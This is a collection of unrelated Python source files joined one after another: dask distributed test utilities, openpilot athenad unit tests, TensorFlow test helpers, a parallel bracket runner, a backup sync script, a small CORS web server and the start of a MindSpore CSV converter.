assert_worker_story([("foo", "id1", now)], [("foo",)])
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",)], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [], strict=True)
@pytest.mark.parametrize(
"story_factory",
[
pytest.param(lambda: [()], id="Missing payload, stimulus_id, ts"),
pytest.param(lambda: [("foo",)], id="Missing (stimulus_id, ts)"),
pytest.param(lambda: [("foo", "bar")], id="Missing ts"),
pytest.param(lambda: [("foo", "bar", "baz")], id="ts is not a float"),
pytest.param(lambda: [("foo", "bar", time() + 3600)], id="ts is in the future"),
pytest.param(lambda: [("foo", "bar", time() - 7200)], id="ts is too old"),
pytest.param(lambda: [("foo", 123, time())], id="stimulus_id is not a str"),
pytest.param(lambda: [("foo", "", time())], id="stimulus_id is an empty str"),
pytest.param(lambda: [("", time())], id="no payload"),
pytest.param(
lambda: [("foo", "id", time()), ("foo", "id", time() - 10)],
id="timestamps out of order",
),
],
)
def test_assert_worker_story_malformed_story(story_factory):
# defer the calls to time() to when the test runs rather than collection
story = story_factory()
with pytest.raises(AssertionError, match="Malformed story event"):
assert_worker_story(story, [])
@gen_cluster()
async def test_dump_cluster_state(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == {a.address, b.address}
@gen_cluster(nthreads=[])
async def test_dump_cluster_state_no_workers(s, tmpdir):
await dump_cluster_state(s, [], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"] == {}
@gen_cluster(Worker=Nanny)
async def test_dump_cluster_state_nannies(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == s.workers.keys()
@gen_cluster()
async def test_dump_cluster_state_unresponsive_local_worker(s, a, b, tmpdir):
a.stop()
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][a.address], dict)
assert isinstance(out["workers"][b.address], dict)
@pytest.mark.slow
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "600ms"},
)
async def test_dump_cluster_unresponsive_remote_worker(c, s, a, b, tmpdir):
clog_fut = asyncio.create_task(
c.run(lambda dask_scheduler: dask_scheduler.stop(), workers=[a.worker_address])
)
await asyncio.sleep(0.2)
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][b.worker_address], dict)
assert out["workers"][a.worker_address].startswith(
"OSError('Timed out trying to connect to"
)
clog_fut.cancel()
def garbage_process(barrier, ignore_sigterm: bool = False, t: float = 3600) -> None:
if ignore_sigterm:
for signum in (signal.SIGTERM, signal.SIGHUP, signal.SIGINT):
signal.signal(signum, signal.SIG_IGN)
barrier.wait()
sleep(t)
def test_check_process_leak():
barrier = mp_context.Barrier(parties=2)
with pytest.raises(AssertionError):
with check_process_leak(check=True, check_timeout=0.01):
p = mp_context.Process(target=garbage_process, args=(barrier,))
p.start()
barrier.wait()
assert not p.is_alive()
def test_check_process_leak_slow_cleanup():
"""check_process_leak waits a bit for processes to terminate themselves"""
barrier = mp_context.Barrier(parties=2)
with check_process_leak(check=True):
p = mp_context.Process(target=garbage_process, args=(barrier, False, 0.2))
p.start()
barrier.wait()
assert not p.is_alive()
@pytest.mark.parametrize(
"ignore_sigterm",
[False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_pre_cleanup(ignore_sigterm):
barrier = mp_context.Barrier(parties=2)
p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
p.start()
barrier.wait()
with check_process_leak(term_timeout=0.2):
assert not p.is_alive()
@pytest.mark.parametrize(
"ignore_sigterm",
[False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_post_cleanup(ignore_sigterm):
barrier = mp_context.Barrier(parties=2)
with check_process_leak(check=False, term_timeout=0.2):
p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
p.start()
barrier.wait()
assert not p.is_alive()
@pytest.mark.parametrize("nanny", [True, False])
def test_start_failure_worker(nanny):
with pytest.raises(TypeError):
with cluster(nanny=nanny, worker_kwargs={"foo": "bar"}):
return
def test_start_failure_scheduler():
with pytest.raises(TypeError):
with cluster(scheduler_kwargs={"foo": "bar"}):
return
|
test_athenad.py
|
#!/usr/bin/env python3
import json
import os
import requests
import tempfile
import time
import threading
import queue
import unittest
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from selfdrive import swaglog
from selfdrive.athena import athenad
from selfdrive.athena.athenad import MAX_RETRY_COUNT, dispatcher
from selfdrive.athena.tests.helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.ROOT = tempfile.mkdtemp()
athenad.SWAGLOG_DIR = swaglog.SWAGLOG_DIR = tempfile.mkdtemp()
athenad.Params = MockParams
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = set([cls.SOCKET_PORT])
def wait_for_upload(self):
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_deviceState():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("deviceState")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message('deviceState')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_deviceState)
p.start()
time.sleep(0.1)
try:
deviceState = dispatcher["getMessage"]("deviceState")
assert deviceState['deviceState']
finally:
p.terminate()
def test_listDataDirectory(self):
print(dispatcher["listDataDirectory"]())
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
with self.assertRaises(requests.exceptions.ConnectionError):
athenad._do_upload(item)
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
finally:
os.unlink(fn)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, 404)
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['item'])
self.assertIsNotNone(resp['item'].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
finally:
athenad.upload_queue = queue.Queue()
os.unlink(fn)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
# TODO: verify that upload actually succeeded
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
os.unlink(fn)
def test_upload_handler_timeout(self):
"""When an upload times out or fails to connect it should be placed back in the queue"""
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
item_no_retry = item._replace(retry_count=MAX_RETRY_COUNT)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item_no_retry)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload with retry count exceeded is not put back
self.assertEqual(athenad.upload_queue.qsize(), 0)
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload item was put back in the queue with incremented retry count
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
os.unlink(fn)
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
try:
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
finally:
athenad.upload_queue = queue.Queue()
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_getVersion(self):
resp = dispatcher["getVersion"]()
keys = ["version", "remote", "branch", "commit"]
self.assertEqual(list(resp.keys()), keys)
for k in keys:
self.assertIsInstance(resp[k], str, f"{k} is not a string")
self.assertTrue(len(resp[k]) > 0, f"{k} has no value")
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
try:
# with params
athenad.recv_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
# without params
athenad.recv_queue.put_nowait(json.dumps({"method": "getNetworkType", "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 1, 'id': 0, 'jsonrpc': '2.0'})
# log forwarding
athenad.recv_queue.put_nowait(json.dumps({'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'}))
resp = athenad.log_recv_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
def test_get_logs_to_send_sorted(self):
fl = list()
for i in range(10):
fn = os.path.join(swaglog.SWAGLOG_DIR, f'swaglog.{i:010}')
Path(fn).touch()
fl.append(os.path.basename(fn))
# ensure the list is all logs except most recent
sl = athenad.get_logs_to_send_sorted()
self.assertListEqual(sl, fl[:-1])
if __name__ == '__main__':
unittest.main()
|
Run.py
|
from Bracket_Class import Bracket, clean_year
import multiprocessing as mp
import time
def parallel_bracket(year):
B = Bracket(year)
B.run()
B.write_to_csv()
B.write()
def p_print(n, label):
if n == 0:
return ''
elif n == 1:
return '{} {} '.format(n, label)
else:
return '{} {}s '.format(n, label)
def htime(s):
    H, i = divmod(int(s), 3600)
M, S = divmod(i, 60)
S = int(S)
return p_print(H, 'hour') + p_print(M, 'minute') + p_print(S, 'second')
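def htime_example():
    # Hedged illustration, not part of the original script: htime() renders a
    # duration in seconds as a human-readable string with pluralised units.
    assert htime(3725) == '1 hour 2 minutes 5 seconds '
    assert htime(59) == '59 seconds '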
if __name__ == '__main__':
print time.ctime()
t1 = time.time()
processes = []
for year in map(clean_year, range(3,15)):
processes.append( mp.Process(target=parallel_bracket, args=(year,)) )
for p in processes:
p.start()
for p in processes:
p.join()
B = {}
for year in map(clean_year, range(3,15)):
B[year] = Bracket.from_file(year)
print time.ctime()
t2 = time.time()
print 'Finished in {}!'.format( htime( t2 -t1 ) )
|
test_util.py
|
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
import contextlib
import math
import re
import threading
import tensorflow.python.platform
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import graph_util
from tensorflow.python.client import session
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import logging
from tensorflow.python.util.protobuf import compare
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
class TensorFlowTestCase(googletest.TestCase):
"""Root class for tests that need to test tensor flow.
"""
def __init__(self, methodName="runTest"):
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
ops.reset_default_graph()
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
if not self._tempdir:
self._tempdir = googletest.GetTempDir()
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses Proto2Cmp() first, as it returns correct results
    for floating point attributes, and then uses assertProto2Equal()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if compare.Proto2Cmp(a, b) != 0:
compare.assertProto2Equal(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form
message: the message to validate
"""
if type(expected_message_maybe_ascii) == type(message):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message)
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type " +
type(expected_message_maybe_ascii) + " and " +
type(message))
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
    `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
def prepare_config(config):
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
      elif force_gpu and config.allow_soft_placement:
        # CopyFrom() returns None, so copy into a fresh proto explicitly
        new_config = config_pb2.ConfigProto()
        new_config.CopyFrom(config)
        new_config.allow_soft_placement = False
        config = new_config
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(graph=None,
config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device(graph_util.pin_to_cpu):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device(graph_util.pin_to_cpu):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail(
"Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
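  # Illustrative usage sketch (not part of the original file), assuming a
  # hypothetical test method on a TensorFlowTestCase subclass:
  #
  #   def testWorkerAssertions(self):
  #     def worker(value):
  #       self.assertGreater(value, 0)
  #     t = self.checkedThread(target=worker, args=(1,))
  #     t.start()
  #     t.join()  # join() fails the test if the worker raised an exception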
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: a float value.
f2: a float value.
err: a float value.
"""
self.assertTrue(math.fabs(f1 - f2) < err)
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
for f1, f2 in zip(farray1, farray2):
self.assertNear(f1, f2, err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
      a: a numpy ndarray or anything that can be converted to one.
      b: a numpy ndarray or anything that can be converted to one.
rtol: relative tolerance
atol: absolute tolerance
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.abs(a - b) > atol + rtol * np.abs(b)
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print "not close where = ", np.where(cond)
else:
# np.where is broken for scalars
x, y = a, b
print "not close lhs = ", x
print "not close rhs = ", y
print "not close dif = ", np.abs(x - y)
print "not close tol = ", atol + rtol * np.abs(y)
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
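  # Worked example for the tolerance check above (illustrative, not from the
  # original file): with the default rtol=1e-6 and atol=1e-6, an element with
  # b == 1000.0 may differ from a by at most atol + rtol * abs(b)
  # = 1e-6 + 1e-3 = 0.001001 before it is reported as "not close".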
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
      a: a numpy ndarray or anything that can be converted to one.
      b: a numpy ndarray or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print "not equal where = ", np.where(diff)
else:
# np.where is broken for scalars
x, y = a, b
print "not equal lhs = ", x
print "not equal rhs = ", y
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in OpError exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
errors.OpError exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message
op = e.op
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(e)
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
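  # Illustrative usage sketch (not part of the original file): both forms the
  # docstring above describes, using the hypothetical MyOperator from the
  # test_session() example.
  #
  #   with self.assertRaisesOpError("negative input not supported"):
  #     MyOperator([-1.0]).eval()
  #
  #   with self.assertRaisesWithPredicateMatch(
  #       errors.OpError, lambda e: "negative" in e.message):
  #     MyOperator([-1.0]).eval()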
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
|
main.py
|
import os
import time
import threading
from copy_files import copy_files
from delete_files import delete_files, delete_empty_folders
from results import compile_results
from utils import load_config
from multiprocessing import Pool
from tqdm import tqdm
# TODO: Fix bug that rewrites skipped and error log files on each use
# TODO: Add log folder on config
def sync(origin, target, job, cpu_cores):
walk_buffer = []
print(f'\nLoading file list for {origin} -> {target}')
for root, dirs, files in os.walk(origin):
walk_buffer.append((root, files, origin, target))
print('File list loaded.')
print('Copying files...')
pool = Pool(cpu_cores)
results = pool.starmap(copy_files, tqdm(walk_buffer, total=len(walk_buffer)), chunksize=10)
pool.close()
pool.join()
print("Done.")
compile_results(results, job)
def delete_extras(origin, target, job, cpu_cores):
walk_buffer = []
print(f'\nLoading file deletion list for {origin} -> {target}')
for root, dirs, files in os.walk(target):
walk_buffer.append((root, files, origin, target))
print('File list loaded.')
print('Deleting files...')
pool = Pool(cpu_cores)
results = pool.starmap(delete_files, tqdm(walk_buffer, total=len(walk_buffer)), chunksize=10)
pool.close()
pool.join()
print("Done.")
compile_results(results, job, delete_mode=True)
delete_empty_folders(target)
def run():
start = time.time()
config = load_config()
sys_config = config['system']
parallel_jobs = (sys_config['parallel_jobs'] == "True")
full_sync = (sys_config['full_sync'] == "True")
max_cpu_cores = int(sys_config['max_cpu_cores'])
num_of_tasks = len(config.sections()) - 1
if parallel_jobs:
cpu_cores = max_cpu_cores // num_of_tasks
else:
cpu_cores = max_cpu_cores
if parallel_jobs:
thread_list = []
for job in config.sections():
if job == 'system':
continue
bkp_obj = config[job]
job_thread = threading.Thread(target=sync, args=(bkp_obj['origin'], bkp_obj['target'], job, cpu_cores))
thread_list.append(job_thread)
if full_sync:
delete_thread = threading.Thread(target=delete_extras, args=(bkp_obj['origin'], bkp_obj['target'], job, cpu_cores))
thread_list.append(delete_thread)
for job_thread in thread_list:
job_thread.start()
for job_thread in thread_list:
job_thread.join()
else:
for job in config.sections():
if job == 'system':
continue
bkp_obj = config[job]
sync(**bkp_obj, job=job, cpu_cores=cpu_cores)
if full_sync:
delete_extras(**bkp_obj, job=job, cpu_cores=cpu_cores)
end = time.time()
minutes, seconds = divmod(end - start, 60)
print("Total time: {:0>2}:{:05.2f}".format(int(minutes), seconds))
if __name__ == '__main__':
run()
|
cors_web_server.py
|
import threading
class CORSWebServer(object):
def __init__(self) -> None:
self.thread = threading.Thread(target=self.serve)
self.server = None
def serve(self):
outer = self
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
class ClojureServer(HTTPServer):
def __init__(self, *args, **kwargs):
HTTPServer.__init__(self, *args, **kwargs)
outer.server = self
class CORSRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
SimpleHTTPRequestHandler.end_headers(self)
test(CORSRequestHandler, ClojureServer)
def start(self) -> None:
self.thread.start()
def stop(self) -> None:
if self.running:
self.server.shutdown()
self.thread.join()
@property
def running(self) -> bool:
return self.server is not None
web_server = CORSWebServer()
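# Illustrative usage sketch (not part of the original module): the module-level
# instance above serves the current directory with CORS headers from a
# background thread (http.server.test defaults to port 8000); `running` only
# becomes True once the underlying HTTPServer has been created.
#
#   web_server.start()
#   # ... requests now receive an Access-Control-Allow-Origin: * header ...
#   web_server.stop()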
|
csv_to_mr.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Csv format convert tool for MindRecord.
"""
from importlib import import_module
import os
from mindspore import log as logger
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
try:
pd = import_module("pandas")
except ModuleNotFoundError:
pd = None
__all__ = ['CsvToMR']
class CsvToMR:
"""
A class to transform from csv to MindRecord.
Args:
source (str): the file path of csv.
destination (str): the MindRecord file path to transform into.
